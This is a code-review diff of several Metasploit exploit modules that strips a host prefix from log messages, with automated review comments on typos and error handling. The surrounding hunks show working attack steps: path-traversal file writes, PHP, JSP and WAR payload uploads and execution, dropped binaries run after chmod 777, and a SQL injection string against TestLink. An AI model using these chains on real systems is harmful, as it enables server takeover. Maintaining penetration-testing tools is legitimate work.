data - vprint_status("#{peer} - Enumerating user data") + vprint_status("Enumerating user data") res = send_request_raw({ 'uri' => "#{base}/index.php/home/myAccount", 'cookie' => cookie @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote return {} if not res if res.code == 404 - print_error("#{peer} - #{username} does not actually have a 'myAccount' page") + print_error("#{username} does not actually have a 'myAccount' page") return {} end 
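Review bot: The cleanup loop in the qdpm_upload_exec `@@ -101,7 +101,7 @@` hunk rescues `::Exception`, which also catches `Interrupt` and `SystemExit`. An operator interrupt during cleanup would be reported as "Unable to remove ..." and the loop would carry on. Unless a non-StandardError is genuinely expected from the session calls, `rescue ::StandardError => e` is the safer form. The `begin` it belongs to is in the preceding hunk, and the enclosing method starts outside both.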
@@ -208,18 +208,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - Unable to request the file") + print_error("Unable to request the file") return end fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || '' if fname.empty? - print_error("#{peer} - Unable to extract the real filename") + print_error("Unable to extract the real filename") return end # Now that we have the filename, request it - print_status("#{peer} - Uploaded file was renmaed as '#{fname}'") + print_status("Uploaded file was renmaed as '#{fname}'") send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"}) handler end @@ -231,10 +231,10 @@ class Metasploit3 < Msf::Exploit::Remote user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with '#{user}:#{pass}'") + print_status("Attempt to login with '#{user}:#{pass}'") opts = login(base, user, pass) if opts.empty? - print_error("#{peer} - Login unsuccessful") + print_error("Login unsuccessful") return end @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload("/tmp/#{bin_name}", bin) end - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") opts = opts.merge({ 'username' => user.scan(/^(.+)\@.+/).flatten[0] || '', 'email' => user, @@ -260,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote }) uploader = upload_php(base, opts) if not uploader - print_error("#{peer} - Unable to upload") + print_error("Unable to upload") return end - print_status("#{peer} - Executing '#{php_fname}'") + print_status("Executing '#{php_fname}'") exec_php(base, opts) end end diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 31e262489c..29d59a6453 100644 
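Review bot: The rewritten status line in the `@@ -208,18 +208,18 @@` hunk keeps the typo "renmaed". Since the line is being touched anyway it should read `print_status("Uploaded file was renamed as '#{fname}'")`. The enclosing method starts outside this hunk.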
--- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif os == 'linux' && target.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected") elsif os.nil? - print_warning("#{peer} - Failed to detect remote operating system, trying anyway...") + print_warning("Failed to detect remote operating system, trying anyway...") end if target.name =~ /Windows.*VB/ @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) vbs = generate_decoder_vbs({ @@ -137,13 +137,13 @@ class Metasploit3 < Msf::Exploit::Remote :encoded_file_name => encoded_file_name, :exe_file_name => exe_file_name }) - print_status("#{peer} - Dropping the VBS decoder to filesystem...") + print_status("Dropping the VBS decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", vbs) register_files_for_cleanup("C:#{temp}#{decoder_file_name}") register_files_for_cleanup("C:#{temp}#{encoded_file_name}") register_files_for_cleanup("C:#{temp}#{exe_file_name}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}") end 
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh" elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) decoder = <<-SH @@ -172,17 +172,17 @@ chmod 777 #{temp}#{elf_file_name} #{temp}#{elf_file_name} SH - print_status("#{peer} - Dropping the decoder to filesystem...") + print_status("Dropping the decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", decoder) register_files_for_cleanup("#{temp}#{decoder_file_name}") register_files_for_cleanup("#{temp}#{encoded_file_name}") register_files_for_cleanup("#{temp}#{elf_file_name}") - print_status("#{peer} - Giving execution permissions to the decoder...") + print_status("Giving execution permissions to the decoder...") execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}") - print_status("#{peer} - Executing decoder and payload...") + print_status("Executing decoder and payload...") execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}") end @@ -191,12 +191,12 @@ SH elf = rand_text_alpha(4 + rand(4)) traversal = "/.." * traversal_depth - print_status("#{peer} - Dropping payload...") + print_status("Dropping payload...") write_file("#{traversal}#{temp}#{elf}", payload.encoded) register_files_for_cleanup("#{temp}#{elf}") - print_status("#{peer} - Providing execution permissions...") + print_status("Providing execution permissions...") execute("#{traversal}/bin/chmod 777 #{temp}#{elf}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}#{temp}#{elf}") end diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index cecbbc0ad0..bc898098c3 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb 
+++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/manage.php", @@ -120,15 +120,15 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end target_path = "#{base}/blogs/download/uploads/#{php_fname}" - print_status("#{peer} - Requesting '#{target_path}'...") + print_status("Requesting '#{target_path}'...") res = send_request_raw({'uri'=>target_path}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end @@ -141,11 +141,11 @@ class Metasploit3 < Msf::Exploit::Remote uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") cookie = do_login(base) if cookie.empty? - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index 044b7584f6..c2b3a72a7b 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb 
@@ -64,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...") + print_status("Uploading Information Gathering JSP #{jsp_info}...") if upload(jsp_info, jsp_path) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed") end @@ -75,17 +75,17 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, jsp_info)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") - print_warning("#{peer} - #{jsp_info} needs to be deleted manually") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") + print_warning("#{jsp_info} needs to be deleted manually") end jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end @@ -93,10 +93,10 @@ class Metasploit3 < Msf::Exploit::Remote if upload_path register_file_for_cleanup(::File.join(upload_path, jsp_payload)) else - print_warning("#{peer} - #{jsp_payload} needs to be deleted manually") + print_warning("#{jsp_payload} needs to be deleted manually") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end 
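Review bot: In the `@@ -64,9 +64,9 @@` hunk the success message after uploading the information-gathering JSP is "JSP payload uploaded successfully", the same text the next hunk prints after the real payload upload. The output then shows two identical lines for two different files, which makes it hard to tell afterwards which upload succeeded. Change the first one to `print_good("Information Gathering JSP uploaded successfully")` so it matches the status line above it and the `fail_with` text below it.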
diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index e35f6bf4b7..c1fd88b671 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -158,13 +158,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get Tomcat installation path - print_status("#{peer} - Retrieving Tomcat installation path...") + print_status("Retrieving Tomcat installation path...") if install_path.nil? fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path") end - print_good("#{peer} - Tomcat installed on #{install_path}") + print_good("Tomcat installed on #{install_path}") if target['Platform'] == "java" exploit_java @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_java - print_status("#{peer} - Uploading WAR file") + print_status("Uploading WAR file") app_base = rand_text_alphanumeric(4+rand(32-4)) war = payload.encoded_war({ :app_name => app_base }).to_s @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable file") + print_status("Uploading executable file") exe = payload.encoded_exe exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8)) if target['Platform'] == "win" diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 79a444c8dc..479ce0f89f 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb 
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -147,13 +147,13 @@ class Metasploit3 < Msf::Exploit::Remote def check_log_file(hint) uri = normalize_uri("/", @jsp_file) - print_status("#{peer} - Waiting for the server to flush the logfile") + print_status("Waiting for the server to flush the logfile") 10.times do |x| select(nil, nil, nil, 2) # Now make a request to trigger payload - vprint_status("#{peer} - Countdown #{10-x}...") + vprint_status("Countdown #{10-x}...") res = dump_line(uri) # Failure. The request timed out or the server went away. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/ - print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}") + print_good("Log file flushed at http://#{peer}/#{@jsp_file}") return true end end @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = payload.encoded print_status("JSP payload available on #{unc}...") - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'version' => '1.1', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/') jsp_shell << "/#{self.file_name}" - print_status("#{peer} - Accessing JSP shell at #{jsp_shell}...") + print_status("Accessing JSP shell at #{jsp_shell}...") send_request_cgi({ 'uri' => normalize_uri(jsp_shell), 'version' => '1.1', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Modify the Class Loader - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") properties = { :directory => 'webapps/ROOT', :prefix => prefix_jsp, 
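Review bot: The rewritten `print_good` in the `@@ -161,7 +161,7 @@` hunk hard-codes `http://` in front of `#{peer}`, so the reported location is wrong whenever the module talks to the target over TLS. Derive the scheme from the module's SSL setting, for example `print_good("Log file flushed at #{datastore['SSL'] ? 'https' : 'http'}://#{peer}/#{@jsp_file}")`. This is also the one message in the section where `peer` is part of the content rather than a prefix, so it is worth a short comment saying it was kept on purpose. `check_log_file` begins in the previous hunk and its loop continues outside this one.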
@@ -274,11 +274,11 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@jsp_file) # Prepare the JSP - print_status("#{peer} - Generating JSP...") + print_status("Generating JSP...") jsp = create_jsp # Dump the JSP to the log file - print_status("#{peer} - Dumping JSP into the logfile...") + print_status("Dumping JSP into the logfile...") random_request = rand_text_alphanumeric(3 + rand(3)) uri = normalize_uri('/', random_request) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index bf8bbb31b9..e9e568a9ee 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, 'Unsupported target platform!') end - print_status("#{peer} - Uploading exploit to #{payload_exe}") + print_status("Uploading exploit to #{payload_exe}") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote append = true end java_upload_part(pl_exe, payload_exe, append) - print_status("#{peer} - Executing payload") + print_status("Executing payload") execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(payload_exe) diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 4a8a64da2c..2d879862d2 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb 
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_exploit - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/ if is_exploit - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end return $1 @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote return target end - print_status("#{peer} - Determining target") + print_status("Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} url = upload_payload(os_finder_payload, false) @@ -233,13 +233,13 @@ class Metasploit3 < Msf::Exploit::Remote unless @cookie fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.") end - print_status("#{peer} - Authentication was successful with the provided credentials.") + print_status("Authentication was successful with the provided credentials.") @my_target = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") end - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup('root/' + jsp_path) end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_path), 'method' => 'GET', 
diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index 2eb0ab33e0..d2ecb468b3 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def send_payload(war_payload, tomcat_path, app_base) # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), 'method' => 'POST', @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting for deployment") + print_status("Upload appears to have been successful, waiting for deployment") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directory") + print_status("Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' 
@@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success! Triggered the payload, should have a shell incoming return if res.code == 200 end - print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...") + print_error("Failed to launch payload. Trying one last time with a different path...") # OK this might be a Linux server, it's a different traversal path. # Let's try again... @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index b64dc1083e..b5096db680 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project <a href="http:\/\/testlink\.sourceforge\.net\/docs\/testLink\.php">Home<\/a><br \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe 
@@ -158,29 +158,29 @@ class Metasploit3 < Msf::Exploit::Remote # register an account user = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Registering user (#{user})") + print_status("Registering user (#{user})") res = register(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Registered successfully") + print_status("Registered successfully") else - print_error("#{peer} - Registration failed") + print_error("Registration failed") return end # login - print_status("#{peer} - Authenticating user (#{user})") + print_status("Authenticating user (#{user})") res = login(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end # set id and table name id = rand(1000)+1 table = 'nodes_hierarchy' - print_status("#{peer} - Setting id (#{id}) and table name (#{table})") + print_status("Setting id (#{id}) and table name (#{table})") begin res = send_request_cgi({ 'method' => 'GET', 
@@ -188,35 +188,35 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 - print_status("#{peer} - Setting id and table name successfully") + print_status("Setting id and table name successfully") else - print_error("#{peer} - Setting id and table name failed") + print_error("Setting id and table name failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, fname, php) if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from directory index - print_status("#{peer} - Retrieving real file name from directory index.") + print_status("Retrieving real file name from directory index.") begin res = send_request_cgi({ 'method' => 'GET', 
@@ -224,19 +224,19 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from directory index.") + print_error("Could not retrieve file name from directory index.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from the database if @token.nil? - print_status("#{peer} - Retrieving real file name from the database.") + print_status("Retrieving real file name from the database.") sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" begin res = send_request_cgi({ 
@@ -246,26 +246,26 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from the database.") + print_error("Could not retrieve file name from the database.") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{@token}.php)") + print_status("Executing payload (#{@token}.php)") begin send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index b8b674d5c3..1098c9140f 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote return CheckCode::Unknown if res.nil? if res.code.between?(400, 499) - vprint_error("#{peer} - Server rejected the credentials") + vprint_error("Server rejected the credentials") return CheckCode::Unknown end @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote arch = detect_arch(res.body) return CheckCode::Unknown unless plat and arch - vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") + vprint_status("Tomcat Manager found running on #{plat} platform and #{arch} architecture") report_tomcat_credential 
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Find the session ID and the CSRF token # - print_status("#{peer} - Retrieving session ID and CSRF token...") + print_status("Retrieving session ID and CSRF token...") unless access_manager? fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload Payload # - print_status("#{peer} - Uploading and deploying #{@app_base}...") + print_status("Uploading and deploying #{@app_base}...") if upload_payload report_tomcat_credential else @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Execute Payload # - print_status("#{peer} - Executing #{@app_base}...") + print_status("Executing #{@app_base}...") unless execute_payload fail_with(Failure::Unknown, "Failed to execute the payload") end @@ -171,9 +171,9 @@ class Metasploit3 < Msf::Exploit::Remote # # Delete the deployed payload # - print_status("#{peer} - Undeploying #{@app_base} ...") + print_status("Undeploying #{@app_base} ...") unless undeploy_app - print_warning("#{peer} - Failed to undeploy #{@app_base}...") + print_warning("Failed to undeploy #{@app_base}...") end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => path) unless res and res.code == 200 - vprint_error("#{peer} - Failed: Error requesting #{path}") + vprint_error("Failed: Error requesting #{path}") return nil end @@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote def find_csrf(res = nil) return "" if res.blank? - vprint_status("#{peer} - Finding CSRF token...") + vprint_status("Finding CSRF token...") body = res.body 
@@ -343,17 +343,17 @@ class Metasploit3 < Msf::Exploit::Remote def upload_payload war = war_payload upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") - vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") + vprint_status("Uploading #{war.length} bytes as #{@app_base}.war ...") res = send_war_payload(upload_path, war) unless res - vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") + vprint_error("Upload failed on #{upload_path} [No Response]") return false end if res.code < 200 or res.code >= 300 vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 - vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]") + vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") return false end @@ -363,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_payload jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") - vprint_status("#{peer} - Executing #{jsp_path}...") + vprint_status("Executing #{jsp_path}...") res = send_request_cgi({ 'uri' => jsp_path, @@ -375,12 +375,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_execute_response(res) unless res - vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") + vprint_error("Execution failed on #{@app_base} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") + vprint_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]") return false end 
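Review bot: In the `@@ -375,12 +375,12 @@` hunk the second check is written `if res and (res.code < 200 or res.code >= 300)` although the `unless res` guard above has already returned, so the `res and` is dead and the low-precedence `and`/`or` are easy to misread. The file already uses `res.code.between?(400, 499)` in `check`, so `unless res.code.between?(200, 299)` would be consistent with that. The `@@ -392,12 +392,12 @@` hunk repeats the same shape and also mixes "WARNING: Undeployment failed" with "Deletion failed" for one operation; pick a single wording and drop the literal "WARNING:" since `vprint_warning` already conveys the level.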
@@ -392,12 +392,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_undeploy(undeploy_url) unless res - vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") + vprint_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") + vprint_warning("Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") return false end diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 3e4a56ed4a..7647d7b20d 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb +++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading PHP to Up.Time server") + print_status("Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote "script" => php_payload }) - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end - print_status("#{peer} - 